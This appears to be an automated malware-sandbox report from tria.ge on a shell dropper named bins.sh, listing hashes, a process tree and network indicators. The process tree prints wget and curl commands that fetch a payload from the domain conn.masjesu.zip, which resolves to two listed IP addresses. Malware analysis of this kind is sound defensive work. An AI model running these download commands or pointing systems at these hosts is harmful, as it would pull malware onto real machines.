Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

3

bins.sh

debian-9-armhf

4

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    148s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    05/01/2025, 02:32 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    fee28388ed6528f99762ba2f3ba8ca79

  • SHA1

    96fadbec3f481fbe68bec359b52496a80a60800d

  • SHA256

    c2fc62fb9126b2d43daafd651743cd04245fa26baa2d7455b8f74dba047f3d95

  • SHA512

    0011dae2524872b6efdfc729d21ce54934a23b683e86729badd43a92ff635da681f8ba4875deb3a8e3ac92232d5d2e325cffb9336a7162d4aa14e4fe606f4cca

  • SSDEEP

    192:parEXzLc3gLVWSXW4Brzcu6JLLc3gLVWS34rzcu6JcKO:qEX9W42e

Score
3/10
discovery

Malware Config

Signatures

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1499
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:1500
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE
          2⤵
          • System Network Configuration Discovery
          PID:1501
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE
          2⤵
          • System Network Configuration Discovery
          PID:1505

      Network

      • flag-us
        DNS
        conn.masjesu.zip
        Remote address:
        1.1.1.1:53
        Request
        conn.masjesu.zip
        IN A
        Response
        conn.masjesu.zip
        IN A
        146.19.162.73
        conn.masjesu.zip
        IN A
        66.63.187.225
      • flag-us
        DNS
        conn.masjesu.zip
        Remote address:
        1.1.1.1:53
        Request
        conn.masjesu.zip
        IN AAAA
        Response
      • 185.125.188.61:443
        tls
        135 B
         2
      • 185.125.188.61:443
        tls
        135 B
         2
      • 151.101.1.91:443
        tls, https
        233 B
         40 B
         1
        1
      • 151.101.1.91:443
        extensions.gnome.org
        tls
        1.0kB
         5.8kB
         13
        14
      • 195.181.164.19:443
        tls, https
        11.6kB
         46
      • 1.1.1.1:53
        conn.masjesu.zip
        dns
        73 B
         105 B
         1
        1

        DNS Request

        conn.masjesu.zip

        DNS Response

        146.19.162.73
        66.63.187.225

      • 1.1.1.1:53
        conn.masjesu.zip
        dns
        73 B
         136 B
         1
        1

        DNS Request

        conn.masjesu.zip

      • 224.0.0.251:5353
        146 B
         2

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.